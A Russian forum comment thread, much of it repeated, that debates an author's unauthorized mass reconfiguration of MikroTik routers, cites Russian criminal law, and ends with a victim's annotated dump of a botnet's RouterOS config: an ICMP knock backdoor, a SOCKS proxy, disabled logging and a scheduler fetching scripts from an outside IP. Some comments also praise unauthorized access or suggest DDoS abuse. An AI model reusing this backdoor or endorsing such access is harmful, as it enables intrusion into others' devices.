1. Неправомерный доступ к компьютерной информации — это не санкционированное собственником или иным законным пользователем информации проникновение к ней, в том числе с возможностью ознакомления, которое позволяет распоряжаться этой информацией (уничтожать, блокировать, модифицировать и т.д.), и создающее опасность как для самой информации, так и для интересов собственника или иного законного пользователя.
3. Предметом неправомерного доступа к компьютерной информации является охраняемая законом компьютерная информация, под которой понимаются сведения о лицах, предметах, фактах, событиях, явлениях и процессах, находящиеся на машинном носителе, в ЭВМ, системе ЭВМ или их сети.
Модификация — это любая переработка содержания исходной информации (например, введение новых данных, уничтожение части информации в файле и т.п.).
Под копированием компьютерной информации понимается воспроизведение данных при помощи компьютерного устройства с сохранением исходной информации.
1. Неправомерный доступ к компьютерной информации — это не санкционированное собственником или иным законным пользователем информации проникновение к ней, в том числе с возможностью ознакомления, которое позволяет распоряжаться этой информацией (уничтожать, блокировать, модифицировать и т.д.), и создающее опасность как для самой информации, так и для интересов собственника или иного законного пользователя.
3. Предметом неправомерного доступа к компьютерной информации является охраняемая законом компьютерная информация, под которой понимаются сведения о лицах, предметах, фактах, событиях, явлениях и процессах, находящиеся на машинном носителе, в ЭВМ, системе ЭВМ или их сети.
Модификация — это любая переработка содержания исходной информации (например, введение новых данных, уничтожение части информации в файле и т.п.).
Под копированием компьютерной информации понимается воспроизведение данных при помощи компьютерного устройства с сохранением исходной информации.
ПО не является компьютерной информацией.
Для защиты ПО используется авторское право, но совсем другая история.
Конфиги в общем случае также не защищаются. Исключением являются только случаи, где данные способствуют коммерческой выгоде. Например, логин\пароль для доступа к Интернету, который в свою очередь используется для заработка. А логин\пароль для доступа к роутеру таковыми не являются. Во всяком случае, доказать это будет сложно.
Для защиты ПО используется авторское право, но совсем другая история.
Конфиги в общем случае также не защищаются. Исключением являются только случаи, где данные способствуют коммерческой выгоде. Например, логин\пароль для доступа к Интернету, который в свою очередь используется для заработка. А логин\пароль для доступа к роутеру таковыми не являются. Во всяком случае, доказать это будет сложно.
Эммм… а чем же тогда является ПО? Любое ПО, насколько я понимаю, это код, хранимый и исполняемый на конечном устройстве. Код — это обычно текст. Текст, который хранится устройстве — это и есть компьютерная информация, нет?
Я думаю, тут граница очень расплывчатая, и при желании можно по-разному трактовать, ибо «информация это сведения/сообщения/данные» из 149-ФЗ — весьма туманное определение. Обычно к коду прилагаются какие-то конфиги или хотя бы константы, которые можно при желании трактовать как данные. Кроме того, будет ли информацией дамп псевдослучайных байтов из /dev/random? А если он использовался в качестве гаммы для «настоящей» информации? А если кто-то постфактум заXORит шифротекст из нее и данных соответствующей длины и таким образом «превратит ее в гамму»? А если брать не случайную последовательность из /dev/random, а сам машинный код программы? Четкая граница между такими тонкими деталями вряд ли будет проведена в каком-нибудь законе, можно максимум смотреть на прецеденты.
У меня нет юридического образования. Думаю Вам лучше обратиться к специалистам, который грамотно распишет почему тут применима 272 статья.
> Конфиги в общем случае также не защищаются.
Если интересно, были случаи посадок за смену IMEI на телефоне.
> доказать это будет сложно
… но не очень то и нужно™. Вы думаете судье очень хочется вникать что там в вашем компюктере за пароли? Ей скучно и у неё ещё 30 дел сегодня. Статистику оправданий по уголовным делам сами найдёте.
Если интересно, были случаи посадок за смену IMEI на телефоне.
> доказать это будет сложно
… но не очень то и нужно™. Вы думаете судье очень хочется вникать что там в вашем компюктере за пароли? Ей скучно и у неё ещё 30 дел сегодня. Статистику оправданий по уголовным делам сами найдёте.
Вечная проблема как классифицировать то или иное поведение примерами из реального мира. Вот если человек порты сканирует, это он ходит вокруг дома и смотрит на него, или стоит у двери с набором отмычек и пытается замок взломать? Где грань пролегает? И опять же, вот у меня во дворе валялась машинка с незапертой дверью, некий гражданин обнаружил это, сообщил в управу, вызвали эвакуатор и утащили на охраняемую городскую стоянку.Подергал дверь, понял что что-то не так и проявил гражданскую сознательность. С другой стороны, тот кто вышел утром и не нашел машины, соответсвенно, потерял время, нервы и деньги на её поиск и добычу со стоянки. Вот это было хорошее или плохое дело?
По хорошему, для дела, тем более уголовного, действительно нужна некая материальная составляющая. Какое-то извлечение прибыли или злонамеренное причинение ущерба. В иных случаях прокурору есть чем ещё заняться.
По хорошему, для дела, тем более уголовного, действительно нужна некая материальная составляющая. Какое-то извлечение прибыли или злонамеренное причинение ущерба. В иных случаях прокурору есть чем ещё заняться.
Именно эта уязвимость.
В нашей стране существует поговорка «Был бы человек, а статья найдётся».
У нас есть статья 272 УК РФ. Но для её применения необходимо доказать преступный умысел.
Вот вы видите, что автомобиль стоит с открытым окном, а на улице осадки. Если вы его накроете полиэтиленом, то к вам нельзя применить даже самоуправство (19.1 КоАП РФ).
Вот я вижу эти открытые окна, закрываю чем могу и пытаюсь сообщить хозяину…
И вот мне интересно, а как тогда работают иследователи в области безопасности, выдавая информацию о количестве поражёных узлов? Их же не сажают пачками?
В нашей стране существует поговорка «Был бы человек, а статья найдётся».
У нас есть статья 272 УК РФ. Но для её применения необходимо доказать преступный умысел.
Вот вы видите, что автомобиль стоит с открытым окном, а на улице осадки. Если вы его накроете полиэтиленом, то к вам нельзя применить даже самоуправство (19.1 КоАП РФ).
Вот я вижу эти открытые окна, закрываю чем могу и пытаюсь сообщить хозяину…
И вот мне интересно, а как тогда работают иследователи в области безопасности, выдавая информацию о количестве поражёных узлов? Их же не сажают пачками?
Вы бесспорно делаете благое дело, и помогаете сообществу.
Но вы не подумали, что если один или несколько из этих сотен тысяч микротиков имеет доступ к себе только за пределами локальной сети и установлен там, где доступ администратора физически затруднён. Своими модификациями вы можете нанести вред или остановить работу какой либо части сети.
Кажется, что в такой сложной области как администрирование чужой сети (а если сравнивать с автомобилем — то выдворение из него бомжа, когда вы увидели что он пытается влезть в чужую, как вам показалось, машину. Или, например, перепарковывать автомобили, взламывая сигнализации, на правильное место, устраняя чужие нарушения) — правильнее будет всеми возможными способами уведомлять владельца, а не заниматься самоуправством?
Но вы не подумали, что если один или несколько из этих сотен тысяч микротиков имеет доступ к себе только за пределами локальной сети и установлен там, где доступ администратора физически затруднён. Своими модификациями вы можете нанести вред или остановить работу какой либо части сети.
Кажется, что в такой сложной области как администрирование чужой сети (а если сравнивать с автомобилем — то выдворение из него бомжа, когда вы увидели что он пытается влезть в чужую, как вам показалось, машину. Или, например, перепарковывать автомобили, взламывая сигнализации, на правильное место, устраняя чужие нарушения) — правильнее будет всеми возможными способами уведомлять владельца, а не заниматься самоуправством?
Я это предусмотрел и такие устройства я пропускал, оставив только комментарий в фаерволе.
Всего найдено мною дырявых устройств 179к, из которых я смог «закрыть» только чуть больше 100к. В остальных я боюсь навредить сильнее.
Всего найдено мною дырявых устройств 179к, из которых я смог «закрыть» только чуть больше 100к. В остальных я боюсь навредить сильнее.
Простите за занудство.
Правильно ли я вас понимаю, что вы анализировали текущий конфиг и если не находили в нём признаков необходимости доступа из вне — закрывали доступ из вне?
Если да, то как вы определяли, что доступ из вне не понадобится в будущем?
Я вижу логическую ловушку в ваших действиях. А учитывая, что вы анализировали такое большое количество устройств и делали это некими эвристиками (явно не в ручную), предположу, что вы не могли предусмотреть все варианты развития событий (хотя бы потому, что вам неизвестны намерения администраторов и их планы по администрированию сети на будущее).
Я бы сильно расстроился, если бы мой маршрутизатор без моего ведома кто-то бы трогал. Даже если этот кто-то мне помог, как ему кажется. Надеюсь, что это всего лишь моя нудная болтовня.
Правильно ли я вас понимаю, что вы анализировали текущий конфиг и если не находили в нём признаков необходимости доступа из вне — закрывали доступ из вне?
Если да, то как вы определяли, что доступ из вне не понадобится в будущем?
Я вижу логическую ловушку в ваших действиях. А учитывая, что вы анализировали такое большое количество устройств и делали это некими эвристиками (явно не в ручную), предположу, что вы не могли предусмотреть все варианты развития событий (хотя бы потому, что вам неизвестны намерения администраторов и их планы по администрированию сети на будущее).
Я бы сильно расстроился, если бы мой маршрутизатор без моего ведома кто-то бы трогал. Даже если этот кто-то мне помог, как ему кажется. Надеюсь, что это всего лишь моя нудная болтовня.
90% без настроенного фаервола с белым ip уже кем-то «потроганы». А остальные 10% обязательно в ближайшее время найдут.
Так соответственно Вы предпочтёте чтобы я его «потрогал» оставив Вам весь его функционал и доступ из локалки или хакер, который заблокироует Вам на него доступ совсем, плюс создаст вирусный трафик?
Так соответственно Вы предпочтёте чтобы я его «потрогал» оставив Вам весь его функционал и доступ из локалки или хакер, который заблокироует Вам на него доступ совсем, плюс создаст вирусный трафик?
Ваша мысль сводится лишь к силе (количеству) моего расстройства. В случае с хакером его просто будет больше.
я из любопытства оставлял голые железки с белой статикой, менял только пароль на учётку админа, в логах через два-три дня огромное количество попыток брутфорса пароля с различных ip.
И в качестве шутки...
За всё время мне написало не более 50 человек…а остальные не смогли попасть на свои роутеры и увидеть ваши сообщения)
Вы явным образом проникаете внутрь в общем то закрытого автомобиля, заводите его и отгоняете на охраняемую автостоянку. Это не «пакетиком накрыл» это уже угон. Если вы этого не понимаете — послушайте доброго совета — не делайте так пожалуйста. Добрыми делами прославиться нельзя ©. Какими бы ни были ваши намерения — вы сильно рискуете нарваться на в общем то адекватную реакцию. И в лучшем случае вам придется долго и нудно объяснять что мол я просто Робин Гуд шел мимо решил помочь. Вам то надо?
PS: Ну и уж если вам так хочется поиграть в доброго робинагуда не смотря на возможные последствия — OK. Но делайте это с умом. Что-то глупее, чем трубить о своих подвигах на хабре придумать IMHO сложно. О какой безопасности разговор :-?
PS: Ну и уж если вам так хочется поиграть в доброго робинагуда не смотря на возможные последствия — OK. Но делайте это с умом. Что-то глупее, чем трубить о своих подвигах на хабре придумать IMHO сложно. О какой безопасности разговор :-?
Спасибо вам за ваши труды!
В одиночку боретесь с несовершенством этого мира!
У меня нет Микротика, но дыры в софте и даже в железе — это бич современности. Ваши советы распространяются на многие устройства. Принципы защиты те же.
В одиночку боретесь с несовершенством этого мира!
У меня нет Микротика, но дыры в софте и даже в железе — это бич современности. Ваши советы распространяются на многие устройства. Принципы защиты те же.
Зачем доступ извне закрывать на чужом устройстве? Достаточно просто влить свежую прошивку. Причем некоторые недоброжелатели после получения доступа к роутеру именно это и делают, чтобы управление никто эксплоитом не забрал назад.
Есть специфика при обновлении со старых версий, если кто не использовал бриджи для объединение, а использовал master\slave, то произойдет автоматическая настройка, которая не учитывает все моменты и может привести к проблемам, вроде также это касается VLAN.
Потому что я несколько раз окирпичивал микротик нажатием кнопки «обновить». Причём один раз на курсах MTCNA.
Если закрыть порты, то человек как минимум через mac-winbox может получить доступ к нему.
Если закрыть порты, то человек как минимум через mac-winbox может получить доступ к нему.
Два года назад обновился через winbox, — тик больше не загрузился. 2 рабочих бекапа только вырубали его. Пришлось руками восстанавливать настройки на новой прошивке.
Были прецеденты?
Давайте обратимся к первоисточникам. А именно — Уголовному Кодексу. По утверждению автора он из Сибири поэтому смотреть будем в УК РФ. Я намеренно не буду вдаваться в наказания — для этого есть соотв. органы. Я буду лишь прикидывать, что можно в принципе повесить на нашего Робина Гуда. Пойдем по порядку.
УК РФ Статья 272. Неправомерный доступ к компьютерной информации
Часть 1 гласит: «Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации»
Попадаем? Вполне. Охраняемая информация на лицо. Модификация, блокирование — запросто. Замечу — в статье ни слова не сказано о злом или каком-либо ином умысле. Получил неправомерный доступ и пошурудил там палкой? Добро пожаловать на ковер! Как минимум — будем разбираться.
Часть 4 гласит «Деяния, предусмотренные частями первой, второй или третьей настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления,»
Об этом мы поговорим чуть позже. Но не могу не удержаться от «наказываются лишением свободы на срок до семи лет.»
УК РФ Статья 273. Создание, использование и распространение вредоносных компьютерных программ
Часть 1 гласит «Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации»
Я не думаю, что автор лечил больных зверят каждого персонально руками. Скорее было нарисовано не суть важно какое ПО, которое сканировало сеть в поисках микротиков, автоматически пробивало их через Феерический Баг (tm), после заходило в управляющий интерфейс (telnet/ssh/web) и выполняло Добро. Это уже, господа, вполне себе попадает под создание и использование программ заведомо предназначенных для несанкционированной модификации.
Часть 3 гласит «Деяния, предусмотренные частями первой или второй настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления, — наказываются лишением свободы на срок до семи лет.». Да. Опять не удержался.
УК РФ Статья 274.1. Неправомерное воздействие на критическую информационную инфраструктуру Российской Федерации
В ней прекрасно Все! Инкапсулированы вышеназванные статьи 273 и 273 но с куда более интересными сроками. Причем тут мы спросите вы? А притом, что
Статья 2. Основные понятия, используемые в настоящем Федеральном законе
6) критическая информационная инфраструктура — объекты критической информационной инфраструктуры, а также сети электросвязи, используемые для организации взаимодействия таких объектов;
7) объекты критической информационной инфраструктуры — информационные системы, информационно-телекоммуникационные сети, автоматизированные системы управления субъектов критической информационной инфраструктуры;
8) субъекты критической информационной инфраструктуры — государственные органы, государственные учреждения, российские юридические лица и (или) индивидуальные предприниматели, которым на праве собственности, аренды или на ином законном основании принадлежат информационные системы, информационно-телекоммуникационные сети, автоматизированные системы управления, функционирующие в сфере здравоохранения, науки, транспорта, связи, энергетики, банковской сфере и иных сферах финансового рынка, топливно-энергетического комплекса, в области атомной энергии, оборонной, ракетно-космической, горнодобывающей, металлургической и химической промышленности, российские юридические лица и (или) индивидуальные предприниматели, которые обеспечивают взаимодействие указанных систем или сетей.
Улавливаете? Любой самый вшивый ФГУП при желании можно притянуть за уши к этому определению.
Выводы… А какие тут выводы? Если с масштабами автор не приврал — IMHO пора менять город, страну, континент и пол. Желающие отплатить вам добром на добро могут прийти с минуты на минуту.
УК РФ Статья 272. Неправомерный доступ к компьютерной информации
Часть 1 гласит: «Неправомерный доступ к охраняемой законом компьютерной информации, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование компьютерной информации»
Попадаем? Вполне. Охраняемая информация на лицо. Модификация, блокирование — запросто. Замечу — в статье ни слова не сказано о злом или каком-либо ином умысле. Получил неправомерный доступ и пошурудил там палкой? Добро пожаловать на ковер! Как минимум — будем разбираться.
Часть 4 гласит «Деяния, предусмотренные частями первой, второй или третьей настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления,»
Об этом мы поговорим чуть позже. Но не могу не удержаться от «наказываются лишением свободы на срок до семи лет.»
УК РФ Статья 273. Создание, использование и распространение вредоносных компьютерных программ
Часть 1 гласит «Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации»
Я не думаю, что автор лечил больных зверят каждого персонально руками. Скорее было нарисовано не суть важно какое ПО, которое сканировало сеть в поисках микротиков, автоматически пробивало их через Феерический Баг (tm), после заходило в управляющий интерфейс (telnet/ssh/web) и выполняло Добро. Это уже, господа, вполне себе попадает под создание и использование программ заведомо предназначенных для несанкционированной модификации.
Часть 3 гласит «Деяния, предусмотренные частями первой или второй настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления, — наказываются лишением свободы на срок до семи лет.». Да. Опять не удержался.
УК РФ Статья 274.1. Неправомерное воздействие на критическую информационную инфраструктуру Российской Федерации
В ней прекрасно Все! Инкапсулированы вышеназванные статьи 273 и 273 но с куда более интересными сроками. Причем тут мы спросите вы? А притом, что
Статья 2. Основные понятия, используемые в настоящем Федеральном законе
6) критическая информационная инфраструктура — объекты критической информационной инфраструктуры, а также сети электросвязи, используемые для организации взаимодействия таких объектов;
7) объекты критической информационной инфраструктуры — информационные системы, информационно-телекоммуникационные сети, автоматизированные системы управления субъектов критической информационной инфраструктуры;
8) субъекты критической информационной инфраструктуры — государственные органы, государственные учреждения, российские юридические лица и (или) индивидуальные предприниматели, которым на праве собственности, аренды или на ином законном основании принадлежат информационные системы, информационно-телекоммуникационные сети, автоматизированные системы управления, функционирующие в сфере здравоохранения, науки, транспорта, связи, энергетики, банковской сфере и иных сферах финансового рынка, топливно-энергетического комплекса, в области атомной энергии, оборонной, ракетно-космической, горнодобывающей, металлургической и химической промышленности, российские юридические лица и (или) индивидуальные предприниматели, которые обеспечивают взаимодействие указанных систем или сетей.
Улавливаете? Любой самый вшивый ФГУП при желании можно притянуть за уши к этому определению.
Выводы… А какие тут выводы? Если с масштабами автор не приврал — IMHO пора менять город, страну, континент и пол. Желающие отплатить вам добром на добро могут прийти с минуты на минуту.
И что вы хотите этим сказать?
Вы уверены, что автор делал это все сидя у себя дома со своего компа? И что писал эту статью тоже оттуда же? То, что он нарушает закон он прекрасно понимает, поэтому и пишет что не может выступить на конференции и сорвать заслуженные апплодисменты, приходится вот так скрываться.
> То, что он нарушает закон он прекрасно понимает, поэтому и пишет что не может выступить на конференции и сорвать заслуженные апплодисменты, приходится вот так скрываться.
Эмм… Это наверное такой тонкий юмор, да? Оценил.
>> А чего на mum не пустили? В другом городе или места закончились?
> 1. Я в Сибири, а МУМ в Москве
> 2. Я не так давно сменил работу и на отпуск ещё не заработал
> 3. Работодателю пофиг на микротик, чтобы просить командировку.
Эмм… Это наверное такой тонкий юмор, да? Оценил.
>> А чего на mum не пустили? В другом городе или места закончились?
> 1. Я в Сибири, а МУМ в Москве
> 2. Я не так давно сменил работу и на отпуск ещё не заработал
> 3. Работодателю пофиг на микротик, чтобы просить командировку.
Вы из тех, кто подает в суд на врача, который сломал ребро спасая жизнь?
Господа, вы вообще просчитываете возможные пути развития событий?
Вот представьте банальная ситуация. Робин Гуд ошибся и принес добро не туда. В результате он оставил систему X без внешнего управления. С его точки зрения это добро. Однако с точки зрения горе-админа[ов] системы — это большое зло т.к. система перестала работать. К тому же Робин помимо самого добра ещё и накосячил в процессе. Не специально конечно. Но тем не менее. Система не то, чтобы сильно важная но вполне может поднять волну. Я не просто так привел статью 274.1.
Админам, как крайним, конкретно прилетело по шапке. И это только начало. Они, не будучи дураками, стараются прикрыть свой зад. Им глубоко плевать на Робина, его идеи, пасхалки и всю остальную хрень. Сейчас им интересен повторюсь только свой, личный зад. Как следствие все версии сводятся к внешнему вражескому вторжению. Начинают искать виновного. Поднимают все возможные логи. Естественно находят следы Робина. Проводят консультации с людьми в теме. Обнаруживается, что Робин уже успел засветиться ещё на N-м количестве хонепотов т.к. нес добро всем без разбору. Коррелирующие друг с другом данные накапливаются. Круг сужается. А потом кто-то обнаруживает подарочек на хабре в виде этой заметки. Твоюжмать да так не бывает! Робин, ты? Пробивают. А что — похож. Вот… молодец. Ну иди сюда. Обсудим.
Если у Робина карма так себе то будет именно так, как я описал выше. Не верите? Ваше право. Видимо, истории с провалом реальных злоумышленников ничему вас не учат. Обязательно нужно все проверить на своей шкуре. А жаль. Учитывая заявленный масштаб вероятность попасть не в то место и не в то время отнюдь не нулевая.
PS: Выраженные же Робину респект и подбадривающие улюлюканья кулхацкеров никак не помогут. В тот момент у него будут совсем другие проблемы. Останется только сокрушаться над собственной глупостью.
PPS: Тем же, кто совсем не верит и не читает новостей — описанный выше сценарий я практически списал с Mirai (ссылка тоже откуда то с Хабра). Почитайте на досуге не пожалеете. Триллер хоть куда. Конечно, масштабы не те, мотивы отличаются. Но развитие событий более чем реальное. Пацаны из Mirai это знают как никто другой.
Вот представьте банальная ситуация. Робин Гуд ошибся и принес добро не туда. В результате он оставил систему X без внешнего управления. С его точки зрения это добро. Однако с точки зрения горе-админа[ов] системы — это большое зло т.к. система перестала работать. К тому же Робин помимо самого добра ещё и накосячил в процессе. Не специально конечно. Но тем не менее. Система не то, чтобы сильно важная но вполне может поднять волну. Я не просто так привел статью 274.1.
Админам, как крайним, конкретно прилетело по шапке. И это только начало. Они, не будучи дураками, стараются прикрыть свой зад. Им глубоко плевать на Робина, его идеи, пасхалки и всю остальную хрень. Сейчас им интересен повторюсь только свой, личный зад. Как следствие все версии сводятся к внешнему вражескому вторжению. Начинают искать виновного. Поднимают все возможные логи. Естественно находят следы Робина. Проводят консультации с людьми в теме. Обнаруживается, что Робин уже успел засветиться ещё на N-м количестве хонепотов т.к. нес добро всем без разбору. Коррелирующие друг с другом данные накапливаются. Круг сужается. А потом кто-то обнаруживает подарочек на хабре в виде этой заметки. Твоюжмать да так не бывает! Робин, ты? Пробивают. А что — похож. Вот… молодец. Ну иди сюда. Обсудим.
Если у Робина карма так себе то будет именно так, как я описал выше. Не верите? Ваше право. Видимо, истории с провалом реальных злоумышленников ничему вас не учат. Обязательно нужно все проверить на своей шкуре. А жаль. Учитывая заявленный масштаб вероятность попасть не в то место и не в то время отнюдь не нулевая.
PS: Выраженные же Робину респект и подбадривающие улюлюканья кулхацкеров никак не помогут. В тот момент у него будут совсем другие проблемы. Останется только сокрушаться над собственной глупостью.
PPS: Тем же, кто совсем не верит и не читает новостей — описанный выше сценарий я практически списал с Mirai (ссылка тоже откуда то с Хабра). Почитайте на досуге не пожалеете. Триллер хоть куда. Конечно, масштабы не те, мотивы отличаются. Но развитие событий более чем реальное. Пацаны из Mirai это знают как никто другой.
Прекрасно представляю. Представьте и вы ситуацию, когда из за подобного бага в роутере, или чего то еще, ломают весь ваш продакшн, в течении недели тихонько выливают базу со всеми юзерскими данными, крадут ваш код, потом пытаются шантажировать, продают код другим заинтересованным лицам, которые названивают пользователям со своими услугами, и ваши пользователи сначала на вас жалуются, а потом уходят. Дополните картину красными от всего этого жопами админов и разрабов, которые искали как же смогли взломать ваш прод, который казалось закрыт от всего, а потом исправляли. Так что, я бы предпочел, чтобы похожий «добрый фей» тихо-мирно исправил баг и написал. Мы бы даже выслали ему одну-две месячных зарплат московского сеньора (были случаи) И даже предпочел чтобы у нас прод валялся пол-дня, если «фей» таки накосячил. Потому что это не пошло нам на пользу ни с одной стороны, т.к опыт почти не применим, а денег потеряли и проблем прибыло очень много.
Но я так и не понял, почему вы так переживаете за автора
Но я так и не понял, почему вы так переживаете за автора
Автору респект!
Поделитесь вашим опытом как ещё хакеры могут использовать Mikrotik.
Ещё можно поднимать виртуальные серверы metarouter, заливать туда урезанный Линукс, и он уже спокойно ходит на CC сервер, получает задание например на ddos и льёт весь доступный канал. Для целей ddos, будь я злоумышленником, то точно не использовал socks/vpn или даже dns amplifier. Можете проверить, много ли стоит metarouterов? И ведь если там Линукс, он имеет полный доступ к локальной сети, и к тому же mikrotik-у изнутри, если ещё не сменился пароль и. Администратора.
Так же загляните в Environment
Так быть не должно
Есть определенные сомнения, что наличие окружения связано со взломом операционной системы. Подтвердите или опровергните свою теорию.
Свой вариант
Сам ломал роутер Mikrotik через недавнюю уязвимость, так как человек который знал пароль давно уволился, а было необходимо внести изменения в конфигурацию. Взломал, настроил, обновил, пароль передал владельцу роутера.
Вспомнился Max Butler, который на заре хакерской карьеры аналогичным образом чинил людям уязвимые инстансы BIND :)
Лично мне Микротик не понравился, хотя опыт работы с этим производителем не большой.
Делали в офисе WiFi сеть из двух микротиков, в итоге она то работает, то нет. Долго пытались понять, пришли к тому что что-то с прошивкой. В итоге плюнули и купили другое оборудование.
Вообщем по мне так проблемма в том что софту, что внутри крутится не уделяют нужного внимания.
Делали в офисе WiFi сеть из двух микротиков, в итоге она то работает, то нет. Долго пытались понять, пришли к тому что что-то с прошивкой. В итоге плюнули и купили другое оборудование.
Вообщем по мне так проблемма в том что софту, что внутри крутится не уделяют нужного внимания.
Гм, мой dhcp сервер, который стоит на бридже wan-tv (знаю, дико звучит, но без этого tv приставка не работает), последнее время стал выдавать айпишники на какие-то левые mac адреса. Интересно, не автор ли это случаем был? При этом фаерволл настроен, активность с этого бриджа разрешена только tv приставке. Интернет поднимается через l2pt с этого бриджа. Ничего в голову не приходит, как с этим бороться и как посмотреть активность с этих адресов.
Было бы неплохо соорудить какой то скрипт для «ъ» и выложить его на гитхаб, чтобы запустив его, можно было все проверить, выдать список найденных косяков и по возможности сразу исправить. Возможно многого хочу, а может уже есть такое.
Настраиваете тик, собираете настройки, указанные в статье, и планировщиком отправляете себе на почту (пишут, что значение переменной не может превышать 4096 байт) или смотрите онлайн.
MikroTik — это неоправданно дорогущая игрушка. Сам лично сталкивался с десятками случаев несанкционированных настроек. Получал доступ при попытках сброса пароля. Дешевые бытовые роутеры и точки доступа оказались куда надежнее и деревяннее — парадокс.
Я скажу так: проблема не в роутерах MikroTik, а в самих владельцах этих роутеров, а также в недостаточной компетенции настройщиков и отсутствие единых стандартов.
Я скажу так: проблема не в роутерах MikroTik, а в самих владельцах этих роутеров, а также в недостаточной компетенции настройщиков и отсутствие единых стандартов.
Свой вариант
Открыл 22 наружу. По глупости и по ТЗ. Юзвери пожаловались на медленный вифи. Снаружи подключиться не смог, приехал на точку, подключился, увидел в логах вагон попыток подключиться к 22-му порту. Точка тупо ушла в DoS, но пароль подобрать не успели. Сменил порт и ограничил белый список и было мне счастье. Было это еще в 2012-м.
В опросе не хватает пункта «Ломал сам» :)
Молодец, человек. Всё правильно делает.
Молодец, человек. Всё правильно делает.
Спасибо вам большое! Вот уж не ожидал встретить доброго самаритянина Z399578297824 на Хабре. Можете в личку кинуть альтернативный способ отблагодарить? WMZ не пользуюсь.
Мне интересно насолько безопасен ихний родной DDNS, это ведь централизированая база устройств с уже настроенным удалённым доступом. Поэтому один 0-day и как минимм десятки тысяч устройств заражены.
Статья понравилась. Хоть роутер и чистый, но наблюдения интересные. Спасибо.
Хотелось посмотреть, что же там в u113.rsc, но ссылка gotan.bit:31415/01/u113.rsc не открылась, а whois пишет «gotan.bit не удалось проверить».
ИМХО все смешалось. Кони, люди… Есть железки Mikrotik которые обладают определенными ТТХ, а есть RouterOS с гибким функционалом, документацией и регулярными обновлениями. В одной организации доводилось ставить RouterOS на x86 машину — шикарно! >200 пользователей ходили в интернет, VPN для удаленных работал, балансировка между 2 провайдерами работала. Не могу сказать, что правила FW были какие-то замудреные. Просто запретил всем и все, а потом по необходимости открывал отдельные вещи (клиент-банки кривые, GPS-трекеры слали инфу о машинах и пр.). Так что Микротику как фирме огромное спасибо за крутой продукт аналогов которому (особенно в том-же ценовом сегменте) я не нашел. Итого: надо не дорого под небольшую нагрузку — Mikrotik, надо недорого с нагрузкой выше средней — RouterOS на обычный ПК, хочется чтоб прям ваще надежно и под большую нагрузку — HA-кластер, виртуалки на виртуалках RouterOS. Чем не вариант?.. Заодно в варианте 2 утилизируем ПК на которых манагерам западло работать ибо Win 10 не ставится.
Дык я не понял, домашний Mikrotik hAP надо проверять или нафиг он хакерам не нужен?
Спасибо большое!
Огромное спасибо автору! Лишний раз проверил свой Микротик, но к счастью ничего подозрительного не обнаружил.
Если честно, не совсем понимаю автора. Мой главный вопрос: «Чем вы прячете роутеры от ботнета?» Мой микротик взломали в августе месяце, разрешён был прокси сервис для некоторых клиентов, на которых грешу. Задампил всё это дело, присуствуют адреса кошельков, совпадающие с вашими в статье, и привожу с комментариями:
#В этом разделе добавляются все локальные сети всех интерфейсов на микротике в список allow-ip
/ip firewall address-list
add address=192.168.1.0/24 list=allow-ip
#Здесь в файрволе выключаются все правила с action DROP и в начале вставляются пять правил. Я их пронумеровал и прокоментировал
# 1. action=Tarpit — создаёт соединение, но не разрешает его, держит в памяти, позволяет флудом на порт 30553 исчерпать оперативку роутера
# 2. Здесь, если злоумышленник постучится пакетом ICMP с размером пакета 1083 байта, вносит себя в список описанный в начале «allow-ip», и где тут «I closed the vulnerability with a firewall»
# 3. Разрешает ВСЁ всем кто в списке allow-ip
# 4. Закрывает возможность сделать буфер оверфлоу по UDP DNS кому то ещё. Злоумышленник не хочет делится добычей.
# 5. Блокируются некоторые порты TCP локальных сервисов роутера, злоумышленник опять не хочет делится добычей с другими злоумышлениками
/ip firewall filter
1.add action=tarpit chain=input comment=«Add you ip addess to allow-ip in Address Lists.» dst-port=30553 protocol=tcp
2.add action=add-src-to-address-list address-list=allow-ip address-list-timeout=1h chain=input comment=«I closed the vulnerability with a firewall.» packet-size=1083 protocol=icmp
3.add action=accept chain=input comment=«Please update RouterOS and change password.» src-address-list=allow-ip
4.add action=drop chain=input comment=" You can say thanks on the WebMoney Z399578297824" dst-port=53 protocol=udp
5.add action=drop chain=input comment=«or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1» dst-port=53,8728,8729,21,22,23,80,443,8291 protocol=tcp
#disabled all drop rules
# Ниже включается сервис socks, через который коммуницирует вся бот сеть. Около 10 000 роутеров ломится по этому порту ко мне до сих пор но с меньшей интенсивностью. Заметте, этот порт TCP 4145 не блочится файрволом.
/ip socks
set enabled=yes port=4145
# Выключается весь лог, чтобы владелец не узнал о произошедшем как можно дольше, и чтобы мониторинг ничего не сказал.
/system logging
set 0 disabled=yes
set 1 disabled=yes
set 2 disabled=yes
set 3 disabled=yes
# deleted all entries
# Тут нет никакого телеграмма или обратной связи, но адреса кошельков совпадают с теми что в статье.
/system note
set note=«I closed the vulnerability with a firewall. Please update RouterOS. You can say thanks on the WebMoney Z399578297824 or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1»
# Здесь скрипт и его шедулер для запуска каждые 30 секунд или сразу после ребута, скриптов, что подкладываются в файл mikrotik.php на сервере 95.154.216.164
/system scheduler
add interval=30s name=schedule3_ on-event=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add name=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http"
P.S.: Вы пишите что вырвали из лап ботнета 100 000 устройств, но не приводите пример как именно это делаете. Вы приводите пример что защитили устройство пасхалкой, но эта пасхалка сама по себе зло, которое я описал выше, и появляется вместе со всем остальным кодом выше, что и есть бот сеть. В статье много нестыковок для того, кто столкнулся с проблемой лично. Вы либо плагиатите, поскольку адреса кошельков совпадают и вы утверждаете что они ваши, либо вы и есть злоумышленник, который притворяется что делает добро.
